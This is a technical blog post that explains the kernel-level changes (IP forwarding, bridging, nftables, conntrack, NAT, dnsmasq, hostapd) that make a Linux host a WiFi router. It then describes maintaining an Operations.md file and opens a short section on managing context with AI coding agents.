A Survey of the 7 Configuration Changes That Turn a Multi-homed Linux Host into a Switch/Router

This was written on March 1, 2026

What does it mean to turn a Linux system into networking infrastructure?

I think it is incredibly cool that we can change a Linux system into a networking device. But have you ever wondered:

What are we changing when we turn a Linux system into a router or switch? What are we changing if we make a Raspberry Pi into a WiFi access point? How significant is the change to system performance monitoring? What gates do we have to open to enable packet forwarding and processing?

I’m going to start out with a narrative explanation of the changes that turn a Linux system into a WiFi access point and then I’ll show the commands for implementing it.

I have a cognitive bias: I think of networking devices and computers as different things. This is because the command line experience on networking gear is different from what you experience on servers/hosts. On servers and workstations, you tend to focus a lot on objects on the file system. On networking gear, you spend most of your time working with running processes directly. Commands and interaction objectives on networking gear are very different from those on hosts.

I suspect a lot of other people who have worked in networking have similar feelings about networking appliances versus host operating systems. This might be specific to my journey. But for better or worse, I felt that networking was different from general computing. It isn’t. If you know networking, you can make Linux do networking things if you make 7 changes.

  1. Activating IP Forwarding
  2. Defining The Bridge
  3. Activating nftables policies
  4. Stateful Firewalling with conntrack
  5. Defining NAT and Masquerade policies
  6. Vending DHCP and DNS with dnsmasq
  7. Vending WiFi networks with hostapd

To activate packet processing and forwarding in the Linux kernel, you start by changing the kernel’s configuration for networking. Every Android device that vends a personal WiFi hotspot makes the same general changes.

A packet’s journey through the kernel

Let’s assume we have a Linux machine with a single network interface. A packet arrives on the externally facing interface. The Network Interface Card (NIC) signals an interrupt and the driver pulls the frame into a ring buffer in kernel memory via Direct Memory Access (DMA), where the hardware writes data into RAM without Central Processing Unit (CPU) involvement. The kernel’s networking stack picks the frame up from there, strips the Ethernet header, and examines the Internet Protocol (IP) destination address.

At that point the kernel consults its routing table. If the destination address matches one of the machine’s own interfaces, the packet travels up through the network stack to a listening socket, to a process waiting to handle it. If the destination address matches no local interface and IP forwarding is disabled, the kernel drops the packet and increments a counter in /proc/net/snmp.

The default behavior of Linux is the end of the line for a packet: the kernel will not forward it to another host. We need to change the system if we want to enable routing, and we need a second NIC to send packets across network interfaces. A workstation is a host, not a router.

Now imagine that same system with two NICs (aka dual-homed): how do we get closer to routing packets?

A router’s role is to forward the packets our single-homed host drops by default. Let’s explore each of the steps that move the kernel from a workstation’s conservative posture as a host into a router that routes packets, modifies packet headers, and filters traffic between interfaces.


What is a hook?

In the Linux kernel, a hook is a designated interception point in a code path where external functions can register themselves to execute. Think of it as a slot in an assembly line: the main process pauses at predefined points and runs every function that has registered at that slot, in priority order. Each registered function can inspect, modify, accept, or drop the item passing through. Hooks let the kernel separate its core packet-processing logic from policy decisions like filtering and address translation. The kernel defines where the hooks are; administrators and tools like nftables decide what code runs at each one. The kernel implements hooks as arrays of function pointers stored in structures like struct nf_hook_entries. At each hook point, the kernel iterates the array via nf_hook_slow(), passing each registered callback a pointer to the packet’s sk_buff structure.


Earlier, I made reference to “The kernel’s networking stack.” Just what does that mean?

A packet arrives at the NIC. The driver places it in memory and the kernel’s networking stack processes it through several ordered stages. At defined points along this path, the kernel passes the packet through netfilter, a hook-based framework built directly into the kernel’s networking code.

Netfilter hooks are function pointer arrays registered inside the kernel’s packet processing path. At each hook point, the kernel iterates through every registered function in priority order, passing a pointer to the packet’s socket buffer (sk_buff). Each registered function can accept, drop, modify, or queue the packet. Userspace tools like nftables register callback functions at these hooks by sending commands through a netlink socket, a kernel-userspace Inter-Process Communication (IPC) channel designed for networking configuration.

You can observe netfilter’s activity at runtime. nft list ruleset shows all currently registered tables and chains. conntrack -L shows the live connection tracking table. For deeper inspection, perf trace or bpftrace can attach probes to kernel functions like nf_hook_slow (the function the kernel calls when it iterates hook callbacks), letting you watch individual packet decisions in real time.
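For example, here is a one-liner sketch that counts nf_hook_slow invocations per process context while you generate traffic (it assumes bpftrace is installed; the counts print when you press Ctrl-C):

sudo bpftrace -e 'kprobe:nf_hook_slow { @hits[comm] = count(); }'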

The five standard hook points are:

| Hook | Position in the packet path |
| --- | --- |
| PREROUTING | Immediately on arrival, before any routing decision |
| INPUT | For packets destined for a local process |
| FORWARD | For packets passing through the machine to another host |
| OUTPUT | For packets generated by local processes |
| POSTROUTING | Just before a packet leaves an interface |

After PREROUTING, the kernel makes its routing decision. Packets addressed to the machine itself travel up through INPUT. Packets addressed to other hosts, when forwarding is enabled, move to FORWARD and then out through POSTROUTING. Every configuration step either registers code on one of these hooks or changes how the routing decision behaves.


Change 1: Activating IP Forwarding

IP forwarding is the first gate for enabling transport of packets across interfaces. Without it, the FORWARD hook exists, but the kernel never sends packets to it. Packets arriving for foreign destinations die after the routing lookup. With the gate open, the kernel hands those packets to FORWARD, and every other piece of the router configuration takes effect.

You manage IP forwarding through the /etc/sysctl.d/10-forward.conf file:

/etc/sysctl.d/10-forward.conf

net.ipv4.ip_forward=1

/etc/sysctl.d/ is a drop-in configuration directory for kernel runtime parameters. At boot, systemd-sysctl.service reads every *.conf file in that directory (plus /etc/sysctl.conf) and writes each parameter to its corresponding path under /proc/sys/.

The kernel exposes a virtual filesystem at /proc/sys/ where every tuneable parameter appears as a file. The dotted sysctl notation is just a path translation: net.ipv4.ip_forward maps to /proc/sys/net/ipv4/ip_forward. Writing 1 to this file tells the IPv4 stack to send packets with non-local destinations through the FORWARD hook rather than discarding them. The kernel implements this decision in ip_forward() in net/ipv4/ip_forward.c.

Placing the setting in /etc/sysctl.d/10-forward.conf makes it persistent across reboots.

systemd-sysctl.service reads all files under /etc/sysctl.d/ at boot and applies them in lexicographic order. Restarting the service applies them immediately without requiring a system reboot. You can verify the active value at any time:

cat /proc/sys/net/ipv4/ip_forward

1 means forwarding is live. 0 means the gate is closed, and the rest of the router configuration is inert regardless of what else is configured.
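You can also flip the gate by hand for testing; the sysctl.d file above is what makes the change survive a reboot:

sudo sysctl -w net.ipv4.ip_forward=1              # write the live value immediately
sudo systemctl restart systemd-sysctl.service     # or re-apply everything under /etc/sysctl.d/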

Our first change is setting the kernel’s ip_forward parameter to 1.


Change 2: Defining The Bridge: Collapsing Two Interfaces Into One Segment

A home network serves both wired and wireless clients on the same subnet. The configuration creates a network bridge, br0, and attaches the LAN-side interfaces to it as member ports: wlan0 plus any wired LAN ports the machine has. (In this build, eth0 serves as the WAN uplink and stays out of the bridge.) For details on Linux bridge interfaces, see the kernel bridge documentation.

Our second change is defining a bridge and attaching interfaces to it as member ports, binding them into a single segment for passing packets.

A bridge operates at Layer 2, the Ethernet layer. The kernel’s bridge module maintains a Media Access Control (MAC) address forwarding table. When a frame arrives on eth0, the bridge looks up the destination MAC address in that table and forwards the frame to the port where that address was last seen. If the address is unknown, the bridge floods the frame to all member ports. The bridge expires learned associations after a configurable aging time. To the rest of the network, br0 appears as a single unified switch, one shared Layer 2 segment across both wired and wireless interfaces. The kernel implements bridge forwarding logic in br_forward() in net/bridge/br_forward.c.

This matters for routing because the kernel assigns IP addresses to interfaces, not to physical ports. Assigning 192.168.1.1 to br0 means the router holds a single Local Area Network (LAN) address regardless of whether a client is wired or wireless. Both interfaces carry traffic on the same subnet and communicate at Layer 2 without any routing decision required between them.
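Here is a minimal sketch of building the bridge by hand with iproute2. The wired interface name is illustrative; a persistent setup would normally declare this through systemd-networkd, netplan, or /etc/network/interfaces rather than ad hoc commands:

sudo ip link add name br0 type bridge       # create the bridge device
sudo ip addr add 192.168.1.1/24 dev br0     # the router's single LAN address
sudo ip link set br0 up
sudo ip link set eth1 master br0            # enslave a wired LAN port, if present
# wlan0 is not enslaved here; hostapd attaches it via bridge=br0 (Change 7)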

One important distinction: a wired interface is enslaved to the bridge directly with a single command (for example, ip link set eth1 master br0), and the kernel’s bridge module immediately begins learning MAC addresses from frames arriving on it. A wireless interface (wlan0) cannot be enslaved to the bridge this way.

The 802.11 protocol requires an association and authentication lifecycle that standard Ethernet bridging doesn’t account for. Instead, hostapd manages this relationship: the bridge=br0 directive in hostapd.conf instructs hostapd to attach wlan0 to the bridge once the interface is in AP mode. Wireless clients that associate with the AP are then visible to the bridge as if they were on a wired port. The result is the same unified L2 segment, but the path to get there is different for wired and wireless members.

Per https://wireless.docs.kernel.org/en/latest/en/users/documentation/hostapd.html:

The mac80211 subsystem moves all aspects of master mode into user space. It depends on hostapd to handle authenticating clients, setting encryption keys, establishing key rotation policy, and other aspects of the wireless infrastructure. Due to this, the old method of issuing iwconfig <wireless interface> mode master no longer works

On a standard Ethernet bridge port, any device that sends a frame gets its MAC learned — there’s no prior handshake required at L2. On an 802.11 AP, the MAC layer itself enforces that a client must complete authentication and association (State 3) before the AP will accept or forward its data frames. The AP’s MAC (managed by the driver via mac80211) is the gatekeeper, and it needs a userspace daemon (hostapd) to handle the authentication exchanges. The kernel’s bridge module has no knowledge of 802.11 states — it just sees frames — so it can’t manage this lifecycle on its own.

The bridge-utils package provides brctl for inspecting bridge state. The kernel handles all forwarding logic through the br_netfilter and bridge modules.
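A few inspection commands (brctl comes from bridge-utils; bridge is the iproute2 equivalent):

brctl show              # bridges and their member ports
bridge link             # iproute2 view of bridge port state
brctl showmacs br0      # MAC addresses the bridge has learned on the segment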

Aside: bridges and packet capture. A bridge port is an excellent place to insert a packet capture. Attach a third interface to br0 and mirror traffic to a tap device (for more on tap/tun virtual interfaces, see the kernel tuntap documentation), or use a standalone bridge with a port set to promiscuous mode feeding a capture daemon like tcpdump or Zeek. Because the bridge sees all frames on the segment before any routing or filtering decision, a capture at this layer sees the complete pre-Network Address Translation (NAT), pre-firewall traffic picture. Tools like tcpdump -i br0 or an AF_PACKET socket bound to the bridge interface work at line rate for most home and small-business traffic volumes. These tools max out on a default Linux kernel at around 18 Gbps (at least they did when I last tested them, around 2023). Higher line rates require kernel-bypass or in-kernel fast-path frameworks like the Data Plane Development Kit (DPDK) or eXpress Data Path (XDP).


Change 3: Activating nftables policies: Installing Code on the Hooks

Now that we have a bridge, we need to define packet processing rules via netfilter’s nftables.

Netfilter is the broader kernel-level packet filtering framework that provides the hooks into the network stack, while nftables (via nf_tables) is the modern packet classification engine that operates on top of those hooks. It replaced iptables as the preferred interface, but both ultimately rely on the same netfilter hook infrastructure in the kernel. The kernel implements the nf_tables subsystem in nf_tables_api.c in net/netfilter/.

The firewall and NAT rules in /etc/nftables.conf are callback registrations. nftables sends them to the kernel through a netlink socket, and the nf_tables subsystem installs them at the specified hooks. Each chain declaration names its hook and priority explicitly:

chain forward {
    type filter hook forward priority 0; policy drop;
    iifname "eth0" oifname "br0" ct state { established,related } counter accept
    iifname "br0"  oifname "eth0" ct state { new,established,related } counter accept
    counter
}

This chain controls traffic forwarding between interfaces, the core job of a router. Here’s what’s happening:

The chain definition:

type filter hook forward priority 0; policy drop;

This attaches to netfilter’s forward hook, meaning it only sees packets that aren’t destined for the router itself but need to pass through it. The default policy is drop, so anything not explicitly allowed is silently discarded. This is a deny-by-default posture.

In this WiFi AP setup, eth0 is the WAN-facing interface — the uplink to your ISP or upstream router. br0 is the LAN-facing bridge, which aggregates traffic from wired clients (if any are directly attached) and wireless clients managed by hostapd. All LAN traffic enters and exits through br0, regardless of whether it originated from a wired or wireless device. With that topology in mind, the two rules in the FORWARD chain map directly to the two directions of traffic flow across the router.

Rule 1: Wide Area Network (WAN) to LAN (return traffic only):

iifname "eth0" oifname "br0" ct state { established,related } counter accept

Traffic arriving from eth0 (the WAN/internet side) heading toward br0 (the LAN bridge) is only accepted if conntrack (ct state) shows the connection was already initiated from the LAN side. This means unsolicited inbound connections from the internet are blocked, exactly what you want from a NAT router/firewall.

Rule 2: LAN to WAN (outbound traffic):

iifname "br0" oifname "eth0" ct state { new,established,related } counter accept

Traffic from br0 heading out to eth0 is accepted for new connections as well as existing ones. This lets LAN clients freely initiate connections to the internet.

The trailing counter:

This is a catch-all counter with no action; it just counts packets that matched neither rule above (and will therefore be dropped by the policy). It’s useful for monitoring how much traffic is being rejected.
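To read those counters, list the chain. A sketch assuming the chain lives in a table named inet filter (match the table name in your own ruleset):

sudo nft list chain inet filter forward
sudo watch -n1 'nft list chain inet filter forward'    # watch the counters climb in real time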

This is a classic “stateful” firewall pattern. LAN devices can reach the internet freely, but the internet can never initiate connections inward. The related state also allows things like Internet Control Message Protocol (ICMP) errors and File Transfer Protocol (FTP) data channels that are associated with an existing connection to pass through.

When nftables.service loads or reloads the configuration, it flushes the existing ruleset and installs the new one atomically through the netlink interface. No packet sees a partial ruleset during the transition. Reload with:

sudo systemctl reload nftables.service

Validate a configuration file before applying it:

sudo nft -c -f /etc/nftables.conf

If you are going to dive deep into netfilter, this blog is outstanding.

Our third change is defining nf_tables rules for processing packets.


Change 4: Stateful Firewalling with conntrack

The rule fragments ct state { established, related } and ct state { new, established, related } reference conntrack, the kernel’s connection tracking subsystem. Conntrack is what makes two simple rules sufficient to handle all legitimate traffic. The kernel implements the connection tracking core in nf_conntrack_core.c in net/netfilter/.

Conntrack watches traffic as it passes through netfilter and maintains a table of active flows. Each entry stores the source and destination addresses, ports, protocol, and current connection state. When a LAN client opens a Transmission Control Protocol (TCP) connection to a server on the internet, conntrack creates an entry and marks the flow new. Once the three-way handshake completes, conntrack marks it established. Reply packets from the internet match ct state established in the FORWARD chain and pass through automatically.

The firewall allows outbound connections from br0 to eth0 when they carry state new or established. Return packets arriving on eth0 match as established. Conntrack holds the bookkeeping; the firewall rules consult the table.

The related state covers secondary flows. Protocols like FTP open a control connection and then negotiate a separate data connection on a different port. ICMP error messages tie back to existing TCP or User Datagram Protocol (UDP) flows. Conntrack understands these relationships and marks the secondary flows accordingly, so the firewall accepts them without explicit rules for every protocol variant.
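You can watch conntrack do this bookkeeping directly. Two examples using conntrack-tools:

sudo conntrack -L -p tcp --state ESTABLISHED    # list live TCP flows in the ESTABLISHED state
sudo conntrack -E                               # stream events as entries are created, updated, and destroyed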

Our fourth change expands the kernel’s connection tracking subsystem: we have begun tracking flows for systems beyond just our own host.


Change 5: Defining NAT and Masquerade policies: Rewriting Addresses at the Border

Home networks use Request for Comments (RFC) 1918 private address space: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. The public internet carries routes to none of these ranges. Every packet leaving the LAN needs its source address replaced with the router’s public IP before it exits. Without that replacement, the originating host will never receive replies from the internet.

The postrouting chain at the POSTROUTING hook replaces each outbound packet’s private source address with the router’s public address:

chain postrouting {
    type nat hook postrouting priority 100; policy accept;
    oifname "eth0" counter masquerade
}
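The same chain can be built interactively with the nft command line; declarations in /etc/nftables.conf and nft commands are interchangeable. A sketch assuming a table named ip nat:

sudo nft add table ip nat
sudo nft 'add chain ip nat postrouting { type nat hook postrouting priority 100 ; policy accept ; }'
sudo nft add rule ip nat postrouting oifname eth0 counter masquerade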

The term masquerade relates to the act of disguising oneself. The router presents the LAN client to the outside world under a different identity, the WAN IP, concealing the private address behind a public one. It rewrites each outbound packet’s source address while remembering which internal node made the original request; the remote server responds to the router as if it were the original sender, and the router rewrites the reply and forwards it to the requester. The kernel implements the masquerade action in nf_nat_masquerade.c in net/netfilter/.

Conntrack stores the translation as part of each flow’s entry. The tuple (private IP, private port, public IP, public port, protocol) lives in the conntrack table for the lifetime of the connection. You can inspect it directly:

sudo conntrack -L

Each line shows the original and reply tuples for a live flow, along with the connection state and a timeout countdown. Flows that have been idle long enough age out, and conntrack removes their entries, a key mechanism for preventing the NAT table from growing without bound. TCP connections time out after the session closes or after a configurable idle period. UDP entries use shorter timers because UDP carries no close signal.

The masquerade action reads eth0’s current IP address at the moment the packet is processed, rather than at configuration time. This makes it the correct choice for a WAN interface that acquires its address via Dynamic Host Configuration Protocol (DHCP), where the public IP may change without notice. When the address changes, new connections use the new address automatically. Conntrack retains entries for established connections under the old address until they expire.

Our fifth change is defining rules that modify the sender and recipient addresses in packets processed by the host.


Change 6: Vending DHCP and DNS with dnsmasq: Announcing the Router to New Clients

Every computer on a network needs to know three things to work: its IP address, its default gateway to the internet, and its Domain Name System (DNS) server.

A router must introduce itself to new clients on its network. They arrive without an IP address, without a default gateway, and without a DNS resolver. dnsmasq vends these values to clients through DHCP.

When a device joins the network, it broadcasts a DHCP discovery. dnsmasq listens on br0 and responds with an offer containing an IP address, subnet mask, lease duration, and two DHCP options: option 3 (default gateway, 192.168.1.1) and option 6 (DNS server, 192.168.1.1). Option 3 tells the client where to send packets destined for addresses outside the local subnet. Option 6 tells the client which resolver to query. dnsmasq caches upstream responses locally, reducing query volume and accelerating repeat lookups.

dnsmasq binds to br0 so it serves only the LAN. It never listens on eth0.
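A minimal /etc/dnsmasq.conf sketch for this setup; the address range and lease time are assumptions chosen to match the examples above:

interface=br0                      # serve the LAN bridge only; never eth0
dhcp-range=192.168.1.50,192.168.1.150,12h
dhcp-option=3,192.168.1.1          # option 3: default gateway
dhcp-option=6,192.168.1.1          # option 6: DNS server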

NetworkManager as an alternative: NetworkManager can handle both DHCP server and DNS functions through its built-in dnsmasq integration, activated by setting dns=dnsmasq in /etc/NetworkManager/NetworkManager.conf. NetworkManager launches its own dnsmasq instance and manages its configuration dynamically as interfaces come and go.

There are significant tradeoffs for each approach. NetworkManager’s approach reduces manual configuration and handles interface lifecycle events automatically. This is useful on a laptop or a machine where interfaces appear and disappear. On a dedicated router, you generally will want greater control. NetworkManager may reconfigure dnsmasq or restart it in response to network events, interrupting DHCP leases in unpredictable ways. A static dnsmasq configuration launched by systemd gives you deterministic startup order, explicit binding, and straightforward log inspection via journalctl -eu dnsmasq.service. You know exactly what the daemon is configured to do because you wrote the configuration file.

From a kernel perspective, both paths land in the same place: a userspace process bound to a UDP socket on port 67, servicing DHCP requests arriving on the bridge interface. The kernel doesn’t distinguish between the two arrangements. The difference is in how the daemon is launched, configured, and supervised. This is a service management and operational tradeoff, not an architectural one.

Our sixth change is deploying a new daemon (dnsmasq) for vending DHCP and DNS services to clients on the system’s network(s).


Change 7: Vending WiFi networks with hostapd: Switching the Wireless Card into Access Point (AP) Mode

Wireless interfaces operate in one of several modes. In managed mode, a card scans for access points and associates as a client. In AP mode, the card broadcasts beacons, accepts association requests, and manages the full authentication lifecycle for connecting devices.

The kernel’s mac80211 subsystem provides a unified programming interface for 802.11 hardware across different driver implementations. hostapd communicates with mac80211 through the nl80211 netlink interface, the same socket-based kernel-userspace channel that nftables uses, applied here to the wireless subsystem. Through nl80211, hostapd commands the driver to enter AP mode, sets the Service Set Identifier (SSID), channel, and Wi-Fi Protected Access 2 (WPA2) encryption parameters, and takes ownership of authentication frames.

The bridge=br0 directive in hostapd.conf attaches the AP interface to the bridge as a member port. Wireless clients, once associated, enter the same Layer 2 segment as wired clients. Their traffic arrives on br0, the kernel applies the same netfilter decisions, and packets travel the same forwarding path as everything else on the LAN.
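For reference, a minimal hostapd.conf sketch that implements this. The SSID, passphrase, channel, and country code are placeholder assumptions:

interface=wlan0
bridge=br0                  # attach the AP interface to br0 once in AP mode
driver=nl80211
ssid=ExampleNet
hw_mode=g
channel=6
country_code=US
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=change-this-passphrase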

Debian ships hostapd masked by default. Systemd registers the service but blocks it from starting. This blocking prevents an unconfigured instance from launching and broadcasting an open network. systemctl unmask hostapd removes that block, after which systemctl enable --now hostapd starts it and registers it for future boots.

Our seventh change is deploying a new daemon (hostapd) for vending WiFi networks from the device’s WiFi card.

The Result: A WiFi Router!

Each configuration step activates a different layer of the kernel’s networking architecture. Together, they build a complete forwarding system:

| Step | Kernel mechanism | Layer |
| --- | --- | --- |
| ip_forward=1 via sysctl | IPv4 stack enables FORWARD path | L3 |
| br0 bridge* | Bridge module MAC learning and forwarding | L2* |
| nftables FORWARD chain | Netfilter hook, packet policy | L3/L4 |
| conntrack | Stateful connection table | L3/L4 |
| masquerade | Source NAT at POSTROUTING | L3 |
| dnsmasq DHCP | Gateway and DNS announcement | Application |
| hostapd via nl80211 | AP mode through mac80211 | L2 wireless |

Note on the bridge row: Adding a wired interface to br0 is a direct kernel operation — the bridge module immediately takes over frame forwarding for that port. Adding a wireless interface is indirect: hostapd’s bridge=br0 directive handles the attachment after the wireless card enters AP mode and a client associates. Both result in the same logical L2 segment, but the mechanism differs. If you are debugging bridge membership, brctl show (or ip link show master br0) will show wired members directly; wireless clients appear as learned MAC entries in the bridge’s forwarding table once they associate, which you can inspect with brctl showmacs br0.

Start with a Linux machine in its default state: a workstation that receives packets for itself, forwards nothing, and drops traffic addressed to any IP it doesn’t own. Its IP forwarding gate is closed. Its netfilter FORWARD chain is empty. Its wireless card listens for beacons rather than broadcasting them. It has no DHCP server, no NAT table, and no bridge.

  • IP forwarding opens the gate for the possibility of routing.
  • The bridge collapses the wired and wireless interfaces into a single addressable domain.
  • The nftables chains install policy at the FORWARD hook, deciding what passes and what drops.
  • Conntrack feeds state information into those policy decisions, making simple rules work for complex traffic patterns.
  • Masquerade hides the LAN behind the router’s public identity and keeps a translation table in memory.
  • dnsmasq announces the router’s presence and hands every new client the information it needs to reach the outside world.
  • hostapd converts a client-mode radio into an access point.

These are the changes that transform a Linux system into a WiFi router. You can evaluate and inspect them through 6 commands:

  • cat /proc/sys/net/ipv4/ip_forward for forwarding state,
  • brctl show for bridge membership,
  • nft list ruleset for the active firewall policy,
  • conntrack -L for live flows and NAT mappings,
  • journalctl -eu dnsmasq.service for DHCP lease activity,
  • iw dev for wireless interface mode.

The Operations File: A Pattern for Establishing Maintainable Systems

Sometimes, you forget what you built.

Any complex system outgrows an operator’s memory. When you’re building a solution, you get a handful of services running, and while you’re doing the immediate development you can hold the whole picture in your head. You know where the configs live, which ports map to which services & how to restart the occasionally hanging service. Then one evening something breaks and you realize you can’t remember whether the database runs in a container or as a systemd service. You’re not even sure which log to check first. You’re going to have to probe about for a while- and you’d rather be spending time with your kids.

I started writing operations diaries when I noticed how much time I was spending re-learning my own systems. Every time I needed to do some maintenance on an aging server, I started with twenty minutes of archaeology: I’d do some generic Linux system fingerprinting to retrace how things were wired together, confirm which config controlled what, and eventually rediscover the decisions I had made a year ago.

I don’t do this much anymore. I’ve landed on a pattern that saves me from the archaeology. I build and maintain a structured document (Operations.md) in the home directory of systems I need to maintain, so it’s easy to get re-acquainted as soon as I log into the system. Making this a permanent practice also enables agents to engage with the server without any pre-conceived external context. It answers the questions I usually have when I sit down at the terminal:

  • What’s running on this system?
  • How do I check the health of the important components?
  • What do I do when something goes wrong? and
  • What has gone wrong before?

The operations file is a living document that evolves with the project. The file has the following sections:

Operations.md
├── Quick Reference (status checks, logs, restarts)
├── Architecture Overview (visual map + port table)
├── Services (Homebrew/systemd, launchd, Docker)
├── Hardware Specifications
├── Disk Layout & Usage
├── Network Configuration
├── Listening Ports
├── Scheduled Tasks
├── Remote Access Setup
├── Troubleshooting Guide
├── Configuration Locations
├── Backup Recommendations
├── Known Issues
└── Changelog

I built a tool that can generate a first draft of an operations file for you. It runs platform-native commands on macOS or Linux, collects real system data, and renders a structured Operations.md based on what the script discovers.

This post walks through the concepts behind my Operations.md file. I describe the layout of the document, which is optimized for rapid troubleshooting. I explain the problems each section solves and describe how to start building and maintaining an Operations.md file for systems you need to maintain.

How Do I Know Nothing Is Broken Right Now?

At the very top of the Operations.md file, I capture one command (or a short loop) that checks all critical services at once. Below that, I capture per-service checks for troubleshooting. Imagine a broad check that identifies a problem: now I need to drill into the components that could produce it. Some open-ended troubleshooting will follow, but I always want to start with the broadest check first and the ability to drill into specifics second. If you go after a hunch too soon, you can end up wasting hours on the wrong problem. My operations file starts with guidance on how to quickly collect the state of services on the system:
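For example, a broad first pass might look like the loop below. The service names are assumptions; substitute your own critical units:

for svc in nginx docker postgresql; do
    systemctl is-active --quiet "$svc" && echo "$svc: OK" || echo "$svc: FAILED"
done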

Services often fail silently. A container can report “running” while the application inside has crashed. A database can be online but unable to accept writes because the disk is full. A scheduled job can fail every execution for weeks, but I won’t notice till I need its output.

I handle these risks with a general health check section: a set of commands to run in sequence to verify that each component of the system has what it needs to perform its job.

A good health check tests the delivery experience that a service is supposed to facilitate. For a web application, that means hitting an endpoint and confirming a valid response. For a database, that means running a query. For an API, that means making a real request. Checking whether the process is alive tells us something, but not enough. “Is the process delivering its feature?” tells us whether the system is failing.

Next I need to get a conceptual lay of the land for services running on the system. My operations file addresses this with an architecture overview near the top. The document lists every service, how it was installed (container, systemd unit, native process), what port it listens on, and what it depends on. A diagram showing how traffic flows through the system works for understanding relationships. Both sections give two views of the same information, optimized for different questions: what software is on this system, versus what services and ports are listening on it?

When something breaks, I need to know what else might be affected. When I want to add a new service, I need to know which ports are already taken and which dependencies exist. Without an inventory, I am reasoning about a system I cannot fully describe.

Generally speaking- I always run the same set of discovery commands to figure out the state of the system. I find I don’t retain all of the commands I need for checking systemd, Docker containers, nginx and other services. To overcome my failing memory- I use a Python script to collect the discrete details of the system- and I use an AI agent to infer the details & rationale of the system. If the agent doesn’t get it right- I correct it and update the documentation.

With my current operating practices- I don’t have to keep dragging out my operations diaries to rediscover the state of the system. I can re-apply agents to maintain a self-updating Operations file that gives me the details I need for operating the system and troubleshooting/tuning the core services on the system.

I would recommend writing this section when the system is healthy and there is time to verify each entry. Run through the services, confirm the ports, confirm the install methods, trace the dependency chains. Writing documentation forces you to obtain a level of understanding that casual troubleshooting does not. We cannot write down how a service connects to its database without confirming we actually know which database it uses. The act of writing documentation helps you discover surprises.

How Do I Fix Things When It Does Break?

When something goes wrong, we need a way to diagnose the problem and a record of how similar problems were solved before.

I build the troubleshooting section from specific incidents, each following a pattern: symptoms observed, commands run to investigate, root cause found, fix applied. The most valuable entries are the ones written right after spending two hours solving a problem, while the details are still fresh. In the future, we’ll solve the same problem in five minutes.

I try to organize this section by symptom rather than by cause. When something breaks, I know what I am seeing (the service is unresponsive, the page returns an error, the log is full of a particular message). I don’t know why yet. Entries organized by symptom let me match what I observe to a known pattern without already knowing which components to check.

I try to capture the wrong turns too. If I spend thirty minutes investigating a configuration issue before discovering that the real problem was an upstream provider outage, that sequence belongs in the entry. Next time I see the same symptoms, I check the upstream provider first and save myself from unnecessary detours.

How Do I Know Something Is About to Break?

The operations file addresses potential failures with a section on what to watch and how to check it. For each item, we document the command to check current status.

Known Issues, Constraints, and Workarounds

Every system has compromises. A partition that turned out to be too small. A driver that behaves unpredictably under certain conditions. I capture these in a Known Issues section.

Keeping It Alive: The Operations File as a Living Document

An operations file written once and never updated becomes a liability that provides false confidence. We trust it, act on stale information that no longer reflects the system, and make things worse.

I update the file during all maintenance. When I add a service, I add it to the inventory before moving on to the next task. When I solve a problem, I write the troubleshooting entry while the details are fresh. When I discover a new constraint, I add it to known issues immediately. The file grows with the system instead of drifting away from it. I leverage coding agents to troubleshoot in new ways. I also use coding agents to update the documentation.

A changelog section anchors the document. Every significant change gets a dated entry describing what changed, why it changed, and what I learned in the process. The emphasis belongs on reasoning, because the reasoning behind a decision decays fastest. Capturing the time of the decision makes tech debt manageable.

Over time, this section becomes institutional memory. When I encounter a configuration I do not recognize, the changelog tells me when it was added and what problem it was solving. That context is the difference between “I should not touch this because I do not understand it” and “I understand why this is here and whether it still applies.”

Getting Started: What to Write Down First

If this all sounds like a lot- don’t panic. The scope of a complete operations file can feel paralyzing when you are starting from nothing. So don’t start with a target of completeness. Start from what you already know. Build it over time. Also- don’t start from scratch. I have a tool at the bottom of this post that you can use to do your own initial discovery.

Speedy navigation of expanding Markdown files

As the Operations file grows navigation will get harder. You can use a tool like mindmap-cli to generate a mind map from a markdown file. A mind map generated from the markdown source gives you a bird’s-eye view of the whole structure, collapsible and clickable, without maintaining a separate document. The markdown file itself is for depth. The mindmap is for orientation. Together they let someone operate the system without reading a thousand lines of operations manuals.

Build an Operations.md file for Your System

The tool I mentioned at the top, Operations Discovery Mechanism, automates the hardest part of getting started: the initial inventory. It collects real data from the system using platform-native commands (brew services, launchctl, and lsof on macOS; systemctl, journalctl, and ss on Linux), structures it as JSON, and renders a complete Operations.md with copy-paste ready commands for every service it finds.

Create an Operations directory in the home directory of your target system and clone the repository into it.

gh repo clone CaptainMcCrank/OperationsDiscoveryMechanism

The workflow takes two steps. First, you’ll run the collector script to produce a JSON snapshot of your system. Second, run the renderer to turn that snapshot into a structured markdown document. No dependencies beyond Python 3.9 and the standard library.

# macOS
python3 mac_system_info.py -o system_info.json
python3 generate_operations.py -o Operations.md

# Linux
python3 linux_system_info.py -o system_info.json
python3 generate_operations.py -o Operations.md

For richer documentation, feed the collected JSON to Claude Code with the prompt template embedded in the Readme. Claude can infer relationships between services, add descriptions of what each one does, and flag potential issues that the script collects but cannot interpret.

The Operations.md file covers the architecture overview, the service inventory, the quick reference commands, the port map, and the disk layout. Over time, if you’re disciplined about updating the troubleshooting entries, known issues and changelog, the document becomes extremely powerful. You’ll be able to hop back onto old systems with ease. You’ll be in a position to start doing interesting experiments with agentic operations: agents logging into the system can acquire context without spending tokens on system enumeration.

Defeating context fatigue with agentic scaffolding

I’ve been thinking about how to improve my agent workflows- and I’ve discovered that there is a productivity speed bump you hit as you get more fearless with agentic development: you know the agents cannot be trusted to make the right call, so you review every decision. This slows everything down.

I think I’ve managed to step past this problem. I wanted to share some observations about how one experiences the cognitive speed bump that comes with multiple custom agents- and some methods for overcoming these problems. If you have been brave enough to explore --dangerously-skip-permissions, these problems may sound familiar.

AI skepticism typically starts with doubt about the capability of models. Over the last 3 months, there has been a wave of people recovering from end-of-year holiday tinkering with Claude. People have discovered that frontier models are smart enough to deliver. They can handle complexity. The models continue to get better. Despite this- the challenge of context management is structural, and it gets worse as projects grow.

You have probably noticed that as you do more work with AI agents, your time spent re-explaining a project to the agent increases. It might be that you’re re-delivering the project description you gave last session or relitigating an architectural decision from three sessions ago. Here’s a fun experience: A feature that was already built just got rebuilt, slightly wrong, because an agent with fresh context didn’t know it existed. 

